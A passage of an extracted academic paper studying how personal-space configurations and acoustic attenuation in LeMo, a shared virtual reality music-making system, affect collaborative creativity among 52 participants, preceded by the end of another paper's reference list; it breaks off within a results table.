Van der Lei J, Van Mulligen E, Velterop J, Waagmeester A, Wittenburg P, Wolstencroft K, Zhao J, Mons B. 2016. The FAIR Guiding Principles for scientific data management and stewardship. Scientific Data 3:160018 DOI 10.1038/sdata.2016.18. Wilkinson MD, Senger M, Kawas E, Bruskiewich R, Gouzy J, Noirot C, Bardou P, Ng A, Haase D, Saiz EDA, Wang D, Gibbons F, Gordon PMK, Sensen CW, Carrasco JMR, Fernández JM, Shen L, Links M, Ng M, Opushneva N, Neerincx PBT, Leunissen JAM, Ernst R, Twigger S, Usadel B, Good B, Wong Y, Stein L, Crosby W, Karlsson J, Royo R, Párraga I, Ramírez S, Gelpi JL, Trelles O, Pisano DG, Jimenez N, Ker- hornou A, Rosset R, Zamacola L, Tarraga J, Huerta-Cepas J, Carazo JM, Dopazo J, Guigo R, Navarro A, Orozco M, Valencia A, Claros MG, Pérez AJ, Aldana J, Rojano MM, Fernandez-Santa Cruz R, Navas I, Schiltz G, Farmer A, Gessler D, Schoof H, Groscurth A. 2008. Interoperability with Moby 1.0–it’s better than sharing your toothbrush!. Briefings in Bioinformatics 9:220–231 DOI 10.1093/bib/bbn003. Wilkinson MD, Vandervalk B, McCarthy L. 2011. The semantic automated discovery and integration (SADI) web service design-pattern, API and reference implementa- tion. Journal of Biomedical Semantics 2:8 DOI 10.1186/2041-1480-2-8. Withers D, Kawas E, McCarthy L, Vandervalk B, Wilkinson M. 2010. Semantically- guided workflow construction in taverna: the SADI and biomoby plug-ins. In: ISoLA 2010: Leveraging applications of formal methods, verification, and validation, 301–312. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 34/34 https://peerj.com http://dx.doi.org/10.1038/sdata.2016.18 http://dx.doi.org/10.1093/bib/bbn003 http://dx.doi.org/10.1186/2041-1480-2-8 http://dx.doi.org/10.7717/peerj-cs.110 work_6fazzelrfneund7qlj4jpzclhy ---- None work_6fchrrabknd3vnvyxpbbhrm72a ---- Submitted 11 June 2019 Accepted 24 September 2019 Published 4 November 2019 Corresponding author Liang Men, l.men@qmul.ac.uk Academic editor John Carroll Additional Information and Declarations can be found on page 35 DOI 10.7717/peerj-cs.229 Copyright 2019 Men et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Designing spaces to support collaborative creativity in shared virtual environments Liang Men, Nick Bryan-Kinns and Louise Bryce School of Electronic Engineering and Computer Science, Queen Mary University of London, London, United Kingdom ABSTRACT Shared virtual environments (SVEs) have been researched extensively within the fields of education, entertainment, work, and training, yet there has been limited research on the creative and collaborative aspects of interactivity in SVEs. The important role that creativity and collaboration play in human society raises the question of the way that virtual working spaces might be designed to support collaborative creativity in SVEs. In this paper, we outline an SVE named LeMo, which allows two people to collaboratively create a short loop of music together. Then we present a study of LeMo, in which 52 users composed music in pairs using four different virtual working space configurations. Key findings indicated by results include: (i) Providing personal space is an effective way to support collaborative creativity in SVEs, (ii) personal spaces with a fluid light-weight boundary could provide enough support, worked better and was preferable to ones with rigid boundaries and (iii) a configuration that provides a movable personal space was preferred to one that provided no mobility. Following these findings, five corresponding design implications for shared virtual environments focusing on supporting collaborative creativity are given and conclusions are made. Subjects Human-Computer Interaction, Social Computing Keywords Collaborative cretivity, Virtual reality, Shared Virtual Environment, Collaborative music making, Sonic interaction design, Gesture design, HCI INTRODUCTION The real world envelops us with space that we share with others; in this surrounding environment, we perceive rich sensory information about objects and events happening around us. Using this information, we interact with this outer world around us via inference, manipulation, and exploration. In a similar fashion we interact with other people. In other words, space can be seen as a material of human activity (Raffestin, 2012), and it has a great influence on social activity, e.g., the size of space limits what kind of actions can be performed, the fill material of a space limits how far people can see or hear, and the proxemics between bodies and objects in a space limits their scope of influence. Digital virtual spaces have existed in different forms for several decades. One of the earliest examples are digital games, e.g., Star Trek created in early 1970s provides a computational space that players can visit and experience through text descriptions on a computer screen, see (Case, Ploog & Fantino, 1990). Though these non-immersive media can involve people to a very high level and generate the experience of flow, few of them have enabled people to interact in a natural way that is similar to the way that people How to cite this article Men L, Bryan-Kinns N, Bryce L. 2019. Designing spaces to support collaborative creativity in shared virtual envi- ronments. PeerJ Comput. Sci. 5:e229 http://doi.org/10.7717/peerj-cs.229 https://peerj.com/computer-science mailto:l.men@qmul.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.229 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.229 experience real-world interactions. For instance, the interactions based on keyboards and mouse for input and monitor for output have very different properties to real-world interactions (Gaver, 1992). In contrast, virtual reality (VR) provides a novel space for multisensory experiences (Turchet et al., 2018), and enables people to see, hear, and even interact with a virtual space naturally. It offers the potential for people to coordinate collaborative activities in a much more similar way to the real world, presenting people an opportunity to collaborate in virtual space in a more natural way in comparison to non-immersive digital media. Whilst VR has become a hot topic and has been researched intensively, little attention has been paid to human-human interactions in shared virtual environments (SVEs), with even less being paid to addressing the creative and collaborative aspects of these interactions. We believe that having a better understanding of the role of space and territory within creative collaborations would provide a strong starting point, since real-world collaborations make use of space (Raffestin, 2012) and the demarcation of personal and shared territory is a spatial strategy to affect, influence and control resources and access (Sack, 1983). Hence an effective arrangement and utilisation of a working space can possibly be a crucial factor to a successful collaboration in SVEs too. Thus we are keen on designing and testing working space configurations to see if we can provide more fluid support to creative collaboration in SVEs. We will begin by reviewing related work in SVEs, space, territory, and territoriality. Then the design of our SVE system will be detailed and the study and results will be presented. Finally, the overall study will be discussed and design implications will be given. RELATED WORK Shared virtual environments The term virtual environment (VE) can be traced back to the early 1990s (Bishop & Fuchs, 1992), it emerged as a competing term to virtual reality; however, both are usually equally used to refer to a world created totally by computer simulation (Luciani, 2007). In the mid-1990s, the development of network technology had made it feasible to link many users simultaneously in the same virtual environment, prompting the shared virtual environments (SVEs; Schroeder, 2002). Besides ‘‘SVEs’’, other terms used include multi-user virtual environments, multi-user virtual reality (Carlsson & Hagsand, 1993), collaborative virtual environments (CVEs; Zhang & Furnas 2003) and social virtual reality (SVR). To align with mainstream usage, we will herein use the term SVEs to refer to VE systems in which users experience other participants as being mutually present in the same environment and in which they can interact inter-personally (cf. Schroeder, 2002). SVEs can be seen as a convergence of research interests in VR and Computing Supported Cooperative Work (CSCW; Benford et al. 2001). Whilst single-person VEs may focus on creating a detailed (visual) simulation, the design of SVEs typically prioritises enabling collaboration between users (Nassiri, Powell & Moore, 2010). By enabling multiple people to communicate and interact with each other and providing a natural medium for three-dimensional CSCW (Billinghurst et al., 2000), SVEs are considered emerging tools for a variety of purposes, including Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 2/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 1Toybox Demo for Oculus Touch: https://www.youtube.com/watch?v= iFEMiyGMa58 (Accessed: 2019-09-03). 2A PlayStation VR demo: https://www. theverge.com/2016/3/16/11246334/ playstation-virtual-reality-social-vr-demo (Accessed: 2019-09-03). community activities (Lea, Honda & Matsuda, 1997), online education (Roussos et al., 1997), distributed work and training (Nedel et al., 2016), and gaming and entertainment (see Toybox1 and a PlayStation VR demo2) Despite this, little research exist in the field of supporting collaborative creativity, leaving an open question: how should shared virtual environments be designed to support creative collaboration (cf. Basdogan et al., 2000). Space, territory, and territoriality SVEs constitute virtual spaces, although illusive they are meaningful (Steuer, 1992). We believe gaining a better understanding of the virtual space is an effective way to answer the aforementioned question. ‘‘Space’’ is a material given prior to the happening of actions, and territory emerges as a result of the actions and a production of the actors (Raffestin, 2012), helping people mediate their social interaction (Altman, 1975), which is argued to be a key element to collaboration (Kreijns, Kirschner & Jochems, 2003). Additionally, people were found to perform creative collaboration in a similar way with the real world, they divided the working space and formed territory (Men et al., 2017; Men & Bryan-Kinns, 2019). Thus, potentially, with more knowledge of the virtual space, we can even manipulate the virtual space to influence the collaboration in SVEs. Note in this paper, the term ‘‘space’’ specifically refers to the physical virtual space rather than the space concept in psychology or social science, which falls out of the scope of this paper. Personal and group space in collaboration A ‘‘personal space’’ herein refers to a specific space assigned to a specific person and ‘‘group space’’ refers to a specific space assigned to a specific group prior to the start of activities (e.g., an experiment). In CSCWs that focus on supporting collaborative creativity, providing personal space is argued to be useful (Fencott & Bryan-Kinns, 2010; Men & Bryan-Kinns, 2019), and integrating personal and group spaces, allowing users to work individually in their personal spaces at their own pace, cooperatively work together in the shared space, and smoothly transition between both is important (Greenberg, Boyle & LaBerge, 1999; Sugimoto, Hosoi & Hashizume, 2004). As a starting point of this exploration, Greenberg, Boyle & LaBerge (1999) developed a PDA-based prototype named SharedNotes. They observed how users shifted between the two spaces and recommended against a rigid notion of ‘‘personal’’, instead they suggested the boundary between personal and public should be provided with gradations in subtle and lightweight ways, supporting a fluid transition between personal and public. Following that, Shen, Everitt & Ryall (2003) addressed this concern in their project UbiTable by providing a flexible gradient of sharing semantics. Specifically, rather than the binary notion of public and private space, UbiTable provides an additional semi-private space, in which data is visible but not electronically accessible for others. However, both sets of research were carried out based on 2D media (PDA and projector respectively), which made their findings less informative for VR. Moreover, neither of these two explored more gradations between public space and personal space, i.e., the transition between the public space and personal space is step-less and smoother. In this study, we want to design virtual spatial configurations that provide a more gradual boundary between personal and public spaces and see if this can enable a fluid shift and provide better support for collaboration in VR. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 3/39 https://www.youtube.com/watch?v=iFEMiyGMa58 https://www.youtube.com/watch?v=iFEMiyGMa58 https://www.theverge.com/2016/3/16/11246334/playstation-virtual-reality-social-vr-demo https://www.theverge.com/2016/3/16/11246334/playstation-virtual-reality-social-vr-demo https://www.theverge.com/2016/3/16/11246334/playstation-virtual-reality-social-vr-demo https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 Territory and territoriality in collaboration (SVEs and Tabletop) In a previous study, we found collaborators formed both personal and group territory during collaborative music making in an SVE, and they also had territorial behaviour, e.g., most musical edits were done inside personal territories (Men & Bryan-Kinns, 2019). By manipulating the virtual spatial configurations of an SVE, the formation of territory and territorial behaviour can be influenced and, and as a result, the collaboration can be influenced (Men & Bryan-Kinns, 2019). Because there is limited research on territoriality in VR, and rich research on this in tabletop-based collaboration, we review territoriality in tabletop research as a supplement, which might be informative as it is also a computer- mediated collaboration that evolves territory. The term ‘‘tabletop’’ here refers to interactive tabletop displays, these usually include high quality projectors, flat panel or plasma displays, and touch-sensitive surfaces (Kruger et al., 2004). These electronic tabletops inherit the collaborative benefits of tables, which greatly compensate computers’ disadvantages in this regard (Scott, Carpendale & Inkpen, 2004). Similarly, territoriality also plays an important role in the tabletop collaboration. Collaborators were found to use different types of territory to serve different needs, including sharing, exchanging or storing working tools and resources (Scott, Carpendale & Inkpen, 2004), though some researchers note that removing territorial constraints can promote exploratory group activity (Xambó et al., 2013). Two main types of territory have been identified from research on screen and tabletop mediated collaboration: (1) Personal territory for performing independent activities. When provided with a personal territory, users prefer to test their contribution before introducing it to the group work (Fencott & Bryan-Kinns, 2010). This type of territory serves as a safe place to try and develop alternate ideas before publishing the ideas (Tang, 1991). Users have been found to prefer to rotate items toward themselves in the personal territory (Tang, 1991) and perform very few actions in their collaborators’ personal territories (Scott, Carpendale & Inkpen, 2004). (2) Group territory for performing the main task. In group territory, people create and develop new solutions, transfer resources and provide help (Scott, Carpendale & Inkpen, 2004). It is interesting to note that the orientation properties of objects in the group territory can be used to convey support, to separate ideas or to group products (Tang, 1991). In terms of designing for territoriality, Scott, Carpendale & Inkpen (2004) proposed four guidelines for designing digital tabletop workspaces: (i) visibility of action; (ii) an appropriate size of workspace; (iii) providing functionality in the appropriate locality; (iv) allowing for the grouping of items to facilitate storage. Furthermore, the visibility and transparency of actions have been found to be important in designing group workspaces, as they help collaborators to monitor each others’ actions, maintaining workspace awareness during collaboration (Pinelle, Gutwin & Greenberg, 2003; Fencott & Bryan-Kinns, 2010). However, this can result in overloaded cognitive information, which some people found to be difficult to handle (Fencott & Bryan-Kinns, 2010). To date, little research has explored how such features of workspace might be designed for collaboration in SVEs. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 4/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 3Full source available at: https://sites.google. com/view/liangmen/projects/LeMo EXPERIMENT DESIGN Creativity domain: why collaborative music making Music making, as a collaborative activity that relies on shared goals, understanding and good interpersonal communication, has long been a key form of collaborative creativity (cf. Bryan-Kinns & Hamilton, 2012; Titon & Slobin, 1996). Its unique features make it an excellent activity through which to study collaborative activity. In 2003, Blaine & Fels explored the design criteria of collaborative music-making (CMM) systems and pointed out key features including the media used, player interaction, the systems’ learning curves, physical interfaces and so on. In the same year, with inspiration from Rodden’s (1991) Classification Space for collaborative software, otherwise known as groupware, Barbosa (2003) developed the Networked Music Systems Classification Space, which classifies CMM systems (CMMs) in terms of the time dimension (synchronous/asynchronous) and space dimension (remote/co-located). For instance, Daisyphone (Bryan-Kinns, 2004), which provides shared editing of short musical loops falls into the remote synchronous network music systems in this Classification Space. Other examples include reacTable (Xambó et al., 2013) and BilliArT (Bressan, Vets & Leman, 2017), both of which provide co-located music- making experience, and Ocarina (Wang, 2009), which provides a distributed experience. However, we should note that, despite decades of research into CMMs and SVEs, relatively few SVEs that support CMM have been made. As a result, many basic but crucial questions in this field are waiting to be answered, e.g., how shared virtual environments should be designed to support creative collaboration, such as CMM. Acoustic attenuation Sound attenuates as a result of diminishing intensity when travelling through a medium. This feature of sounds enables humans to use their innate spatial abilities to retrieve and localise information and to aid performance (cf. Billinghurst & Kato 2002). Whilst it is hard to adjust the acoustic attenuation of a real medium (e.g., the air) to enhance its potential, within VR, as the audio is simulated, we can simulate an augmented spatialised sound purposely. Research has been done on investigating the impacts of spatialised sounds on user experience in VR, e.g., (Hendrix & Barfield, 1996). However, little research explores how the spatialisation of sound may affect or aid collaboration in SVEs (e.g., CMM). Considering sound is both the primary medium and the final output of the creative task CMM (Men & Bryan-Kinns, 2019), by affecting the audio, different settings of acoustic attenuation can possibly affect the collaboration differently. With the ability to modify the simulated acoustic attenuation in an immersive virtual environment, we can possibly create sonic privacy by augmenting acoustic attenuation, this privacy may then be used as personal space supporting individual creativity in CMM. LeMo—An SVE for collaborative music making We created Let’s Move (LeMo3), which enables two users to manipulate virtual music interfaces together in an SVE to create a 16-beat music loop, see Fig. 1. LeMo used in this study and Men & Bryan-Kinns (2019) is an extensively modified version of the previous version (Men & Bryan-Kinns, 2018). Major differences include a new visual Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 5/39 https://sites.google.com/view/liangmen/projects/LeMo https://sites.google.com/view/liangmen/projects/LeMo https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 Figure 1 Participant 4A and 4B are creating music together. Full-size DOI: 10.7717/peerjcs.229/fig-1 presentation of the interface, the ability to add, delete, and re-position music loops, with more freedom in terms of instruments, tempo, volume and pitch. These changes are made to improve the experience of music making and, more importantly, to enable users to re-position and share music loops, which is essential for this study. Hereafter, ‘‘LeMo’’ specifically refers to this modified version. LeMo was programmed in Unity, models and textures were made in Cinema 4D and Photoshop respectively. The run-time environment includes two HTC Vive headsets (each with a Leap Motion mounted, see Fig. 1C). The position and rotation of headsets are tracked by two tracking cameras set Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 6/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-1 http://dx.doi.org/10.7717/peerj-cs.229 Figure 2 (A) The gesture to generate a new interface; (B) Matrix (opened interface) and sphere (packed interface), double click the pop button to switch in between (reproduced from Men & Bryan-Kinns 2019). Full-size DOI: 10.7717/peerjcs.229/fig-2 around the scene, and hand gestures are tracked by the mounted Leap Motion. Two PCs are used to run LeMo, these are connected and synchronised via a LAN cable. LeMo has three key elements: (1) Music interface—LeMo allows users to generate, remove, position and edit virtual music interfaces, which have two modes: sphere and matrix (Fig. 2B). Users can generate up to eight spheres with pinch and stretch gesture, see Fig. 2A. The music interface can be switched between the two modes, re-positioned or removed by manipulating the sphere or the pop button of the matrix with corresponding gestures. As shown in Fig. 3, the matrix interface contains a grid of 16 × 8 dots, with controllers at the bottom. Each row represents the same pitch, forming an octave from bottom to top. Users can edit notes by tapping dots. A vertical play-line repeatedly moves from left to right playing corresponding notes. In this way, each interface generates a 16-note music loop. Three controllers (tempo, volume and pitch) and two functional buttons (erase and switch) are located at the bottom of the matrix interface. (2) Avatars—Each user has an avatar, including a head and both hands (Fig. 1). Avatars are synchronised with users’ real movements in real time, including position and rotation of heads, as well as gestures. LeMo provides visual aids for collaboration by synchronising the virtual environment (virtual space and music interfaces) and avatars across a network, providing participants with the sense of being in the same virtual environment and manipulating the same set of interfaces. (3) A virtual space that includes a grey stage with a grid pattern (part of it is shown in Fig. 1D). Four types of spatial configurations were designed for this study, which will be detailed later. Beside these three fundamental elements, LeMo also has: Spatialised audio (volume drops with distance) so that users can hear where the sounds originate; A voice notification system to facilitate the experiments, e.g., in experimental scenario users will hear ‘‘1 min left’’ and ‘‘end of session’’ notifications; A data-log system based on trackers (HTC Vives and Leap Motion) to log time-stamped data from events generated by users’ interactions and movements, including positions and rotations of heads, index fingers, thumb fingers, the manipulation with musical interface (addition/deletion/re-positioning Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 7/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-2 http://dx.doi.org/10.7717/peerj-cs.229 Tempo Volume Erase Pop Switch Pitch Same row for same notes, different row for different notes, 8 rows cover the one-line octave A virtual playline checks columns left to right, and plays notes if dots activat- ed C B A G F E D C Note Figure 3 A C major scale, starting from C4 and finishing at C5, and going back to C4. Full-size DOI: 10.7717/peerjcs.229/fig-3 of musical interfaces, addition and deletion of music notes), usage of personal space (activation/deactivation of personal spaces). Hypotheses Research has suggested that users should be allowed to work individually in their personal spaces at their own pace, cooperatively work together in the shared space, and smoothly transition between both of the spaces during collaboration (Greenberg, Boyle & LaBerge, 1999; Shen, Everitt & Ryall, 2003; Sugimoto, Hosoi & Hashizume, 2004). In a previous study (Men & Bryan-Kinns, 2019), following this implication, we built three different spatial configurations (public space only, public space + publicly visible personal space, public space + publicly invisible personal space), and tested different impacts of these spatial configurations on collaborative music making in an SVE. The results showed adding personal space to be helpful in supporting collaborative music making in SVE, since it provided a chance to explore individual ideas, and provided higher efficiency. However, several negative impacts also showed up along with the addition of personal space, e.g., longer average distance between participants, reduced group territory and group edits (Men & Bryan-Kinns, 2019). We believe this might due to: (i) the separated stationary locations of the personal spaces, forced collaborators to leave each other to access, and resulted in a longer distance between collaborators and less collaboration; (ii) the rigid boundary between public space and personal space made users more isolated, resulting in a higher sense of isolation. Thus, we are keen on designing new types of personal territory to eliminate these disadvantages, and to provide a more flexible, more fluid collaboration experience. To increase the flexibility, we want to enable users to use personal space anywhere on the stage in the SVE, and see how this flexibility might positively affect the collaboration, thus H1 was developed. To make the shift between personal and public spaces more fluid, inspired by the implication that the separation between public and personal workspace should be Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 8/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-3 http://dx.doi.org/10.7717/peerj-cs.229 gradual rather than too rigid (Greenberg, Boyle & LaBerge, 1999), we think the attenuation feature can be applied to form a gradual personal space and enable a fluid transition between personal space and public space. This is because the sound is both the primary medium of collaborative tasks and the final work of CMM (Men & Bryan-Kinns, 2018), by manipulating acoustic attenuation, we can produce sonic privacy. For example, different levels of attenuation can lead to different levels of sonic privacy, and a high level of sonic privacy may play a similar role of personal space, thus H2 was developed. Additionally, the acoustic attenuation, rather than a personal space with rigid separation from public space, enables a gradual shift between personal and public workspace, which may possibly increase the fluidity of the experience and support collaboration better (cf. Greenberg, Boyle & LaBerge 1999). Thus we developed H3. Below are the three hypotheses: H1—Personal space with mobility provides better support for collaboration than personal space with no mobility. H2—Attenuation can play a similar role to personal space with rigid form (cf. Men & Bryan-Kinns 2019) in CMM in SVE, providing collaborators with a personal space and supporting individual creativity during the collaboration. H3—Acoustic attenuation provides a fluid transition (no hard borders nor rigid forms) between personal and public spaces, which supports collaboration better compared to conditions with rigid borders. Independent variable Spatial configuration is the independent variable in this experiment. As shown in Fig. 4, four space configurations were designed as the independent variable levels to investigate these three hypotheses, including: Condition 1: Public space only (referred to as Cpub): where players can generate, remove or manipulate music interfaces, and have equal access to all of the space and the music interfaces. As no personal space is provided, a shift between public and personal space does not exist, and users cannot shift to personal space. Condition 2: Public space + Augmented Attenuation Personal Space (referred to as Caug). In addition to Cpub, the acoustic attenuation is augmented. The volume of audio drops much faster, creating a sonic privacy, which can be seen as a personal space. As the volume changes gradually with the changes in distance, the shift between personal space and public space is gradual. Condition 3: Public space + Fixed Personal Space (referred to as Cfix). In addition to Cpub, each user is now provided with a personal space located at the corner of the stage (see Fig. 4), which works like a acoustically solid (soundproof) boundary between public space and personal space. In other words, the shift between personal space and public space is now rigid. Each user has a handle to activate/deactivate the personal space, the handle appears automatically over their head when they look up. Condition 4: Public space + Moveable Personal Space (referred to as Cmov). Every feature of this condition is the same as Cfix, except now the personal space appears centring the user’s current head’s position when being triggered. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 9/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 Figure 4 Components of the virtual experiment scene. Note: the rigidly soundproof personal space and the handle switch were only available in Cfix & Cmov (A); Tilted view of the four experimental condi- tion settings (B, C, D, E). Full-size DOI: 10.7717/peerjcs.229/fig-4 Note: to make conditions more realistic and less artificial, the acoustic attenuation in Cpub, Cfix, Cmov are set to mimic the real acoustic attenuation in the real world rather than no attenuation at all. Dependent variables To identify how users use the space and the effect of adding personal space with different properties, a series of dependent variables were developed, which can be split into Participant Reports and Activity Assessment. Participant reports Questionnaires were used to collect participants’ subjective assessment of the conditions and their experience of the collaboration. The Igroup Presence Questionnaire (IPQ) was used to inform the design of questions about the sense of the collaborator’s presence (Schubert, Friedmann & Regenbrecht, 2001). Questions about output quality, communication, and contribution were adapted from the Mutual Engagement Questionnaire (MEQ; Bryan- Kinns, 2013). The rest of the questions were designed to question people’s preference for conditions. The questionnaire included questions on: Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 10/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-4 http://dx.doi.org/10.7717/peerj-cs.229 4The Queen Mary Research Ethics Committee granted ethical approval to carry out the study within its facilities (Ethical Application Ref: QMREC2005). (1) Presence: (i) sense of co-worker’s presence and (ii) sense of collaborator’s activities. Note that the measure ‘‘sense of self-presence’’ is not included in this study, because a previous study (Men & Bryan-Kinns, 2019) has shown LeMo’s capability on producing a high-level of self-presence. (2) Communication: quality of communication, which may vary as the visibility of spaces can possibly affect the embodiment and nonverbal communication. (3) Content assessment: the satisfaction of the final music created reflects the quality of collaboration, cf. (Bryan-Kinns, 2013; Bryan-Kinns & Hamilton, 2012). (4) Preference: preference of the conditions, checking if users have subjective preferences towards the settings. (5) Contribution: (i) the feeling of self’s contribution; (ii) the feeling of others’ contribution. These measures were set to see the effects of spatial configurations on the sense of contribution. These measures will be grouped into a Post-Session Questionnaire (PSQ, see its items in Table 1), to be filled after participants experiencing each condition, and a Comparison Questionnaire (CQ, see its items in Table 2), to be filled at the end of the experiment. Activity assessments To access the characteristics of collaboration, we developed the following measures of activity in the collaboration based on the system-logged data: (1) Contribution: (i) number of musical note edits; (ii) number of note additions/dele- tions; (iii) number of mutual note modifications. Here a mutual note modification indicate an edit on a certain note, the last update of which was performed by the collaborator, cf. (Bryan-Kinns, Healey & Leach, 2007). (2) Time and amount of use of personal space (only in condition Cfix and Caug, as this measure is based on the time-stamped entries of the rigid boundary of personal spaces): (i) number of uses of, (ii) length of time of using, and (iii) average duration of each use of personal space. (3) Location and territory: (i) distribution of participants’ locations and interactions; (ii) the sizes of personal/group territory; (iii) note edits fallen in different types of territory; (iv) average distance between participants, cf. colocation in (Bryan-Kinns, 2013). (4) Attention: (i) time participants spent paying close/ordinary attention to collaborator; (ii) number of times paying close/ordinary attention to the collaborator. Strictly speaking, here ‘‘paying attention’’ means ‘‘facing toward the collaborator‘s avatar’’ as no eye tracker was involved in this study. Participants and procedure Fifty-two participants (26 pairs) were recruited for this study4 via emails sent to group lists within the authors’ school. All participants were aged between 18 and 35, with an average age of 23.00 (SD = 4.37). Participants’ mean rating of personal musical theory knowledge is 3.92 (SD = 2.50) on a 10-point Likert scale, where higher values indicate increased knowledge. Twenty four (46.15%) played one or more instruments, and the remaining 28 (53.85%) did not. Participants’ rating of experience of collaboratively composing music is 2.13 (SD = 1.56) on a 10-point Likert scale, where higher values indicate Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 11/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 Table 1 Results of Post-Session Questionnairea and results of Wilcoxon Rank Sum Test (two-tailed)b. Questions Cpub Caug Cfix Cmov Cpub vs Caug Cpub vs Cfix Cpub vs Cmov Caug vs Cfix Caug vs Cmov Cfix vs Cmov M (SD) M (SD) M (SD) M (SD) p (W) p (W) p (W) p (W) p (W) p (W) PSQ1 (support for creativity)—I think the spatial configuration in this session was extremely helpful for creativity 8.55 (1.44) 8.77 (1.34) 7.61 (2.01) 7.82 (1.94) 0.5695 (259) 0.07706 (396.5) 0.1563 (379) 0.02372 (492) 0.06318 (469) 0.695 (368) PSQ2 (support for creativity)—I feel like the spatial configuration in this session was extremely helpful to support the development of my own ideas 7.82 (1.92) 8.35 (1.50) 7.71 (1.88) 7.75 (1.62) 0.5211 (255.5) 0.6456 (331.5) 0.5029 (342) 0.2172 (434) 0.1452 (446.5) 0.8999 (400) PSQ3 (preference)—I enjoyed the spatial configuration of this virtual world very much 8.27 (1.61) 8.65 (1.60) 8.18 (1.87) 8.07 (1.86) 0.2622 (233) 0.9358 (303.5) 0.3863 (311.5) 0.3863 (412.5) 0.2165 (433.5) 0.8010 (407.5) PSQ4 (sense of collaborator’s presence)—I always had a strong feeling that my collaborator was there, collaborating with me together, all the time 8.91 (0.92) 8.54 (1.68) 7.07 (2.52) 7.93 (2.26) 0.7961 (298.5 ) 0.004813 (450) 0.1636 (377.5) 0.01946 (497) 0.3229 (420) 0.1368 (302) PSQ5 (content assessment)—How satisfied are you with the final piece of loop music you two created in this session 8.64 (1.73) 8.38 (1.50) 7.21 (2.22) 8.32 (1.96) 0.4287 (323.5) 0.005155 (448.5) 0.5557 (337.5) 0.05449 (473.5) 0.803 (349.5) 0.02163 (254) PSQ6 (communication quality)—How would you rate the quality of communication between you and your collaborator during the session 8.68 (1.09) 8.50 (1.36) 7.04 (2.25) 8.04 (1.97) 0.7644 (300.5) 0.004494 (450.5) 0.3038 (359) 0.01038 (510) 0.5404 (399) 0.05073 (274) PSQ7 (sense of collaborator’s activity)—I had a clear sense of what my collaborator was doing 8.73 (1.20) 7.96 (1.54) 6.50 (2.52) 7.29 (2.49) 0.08094 (368.5) 0.0003856 (487.5) 0.03436 (414.5) 0.02786 (489.5 ) 0.5095 (402) 0.176 (310) PSQ8 (amount of contribution)—The amount of your contribution to the joint piece of music is 8.41 (1.44) 8.15 (1.46) 6.96 (2.15) 7.50 (1.67) 0.4776 (320) 0.009236 (439.5) 0.03928 (412) 0.04281 (479.5) 0.166 (443) 0.4489 (346) PSQ9 (amount of contribution)—The amount of your collaborator’s contribution to the joint piece of music is 8.18 (1.26) 8.23 (1.39) 7.29 (1.96) 7.61 (1.97) 0.8486 (276.5) 0.08916 (394) 0.4025 (350.5) 0.06406 (469.5) 0.3008 (423) 0.4739 (348.5) PSQ10 (quality of contribution)—What do you think of the quality of your contribution to the joint piece of music is 8.05 (1.70) 7.81 (1.41) 7.36 (1.68) 7.86 (1.53) 0.319 (333.5) 0.1031 (390) 0.4648 (345) 0.3596 (416.5) 0.2829 (327) 0.8599 (353.5) PSQ11 (quality of contribution)—What do you think of the quality of your collaborator’s contribution to the joint piece of music is 7.73 (1.52) 8.19 (1.20) 7.54 (1.50) 7.75 (2.05) 0.3496 (241.5) 0.5636 (337.5) 0.6459 (284.5) 0.1143 (453.5) 0.6992 (386) 0.3559 (336.5) Notes. aWith 10-point-Likert scale, 1 indicates no fulfilment at all with the description of the questionnaire and 10 indicates a full fulfilment. bNote statistics in this table are calculated based on the data collected from the third and fourth session to counterbalance the learning effect. M en etal. (2019),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.229 12/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 Table 2 Results of Binomial Test of Comparison Questionnaire (CQ)a. Question description Option Cpub Caug Cfix Cmov k p k p k p k p CQ1 (preference)—In which session, you enjoyed the spatial configuration the most? most enjoyed 10 0.2146 16 0.2089 10 0.2146 16 0.2089 least enjoyed 15 0.3084 10 0.2146 20 0.02205 7 0.03317 CQ2 (content assessment)—In which session, you made the music you were most satisfied with? most satisfied 16 0.2089 12 0.4469 10 0.2146 14 0.4262 least satisfied 13 1.000 9 0.1292 21 0.01054 9 0.1292 CQ3 (coordination)—Which session you found most difficult to track collaborator’s activities? most difficult 7 0.03317 12 0.4469 20 0.02205 13 1.000 least difficult 22 0.004691 14 0.4262 8 0.06971 8 0.06971 CQ4 (sense of collaborator’s presence)—Which session did you have the strongest sense that your collaborator was there working with you together strongest 27 2.807e−05 17 0.1322 2 5.277e−05 6 0.01368 least strongest 4 0.001378 7 0.03317 28 8.12e−06 13 1.000 CQ5 (communication quality)—Which session did you have the best quality of communication between your self and your collaborator best quality 20 0.02205 17 0.1322 4 0.001378 11 0.3232 worst quality 6 0.01368 13 1.000 25 0.0002698 8 0.06971 CQ6 (preference)—Which session had the best setting for creating a good piece of music collaboratively best setting 16 0.2089 16 0.2089 8 0.06971 12 0.4469 worst setting 13 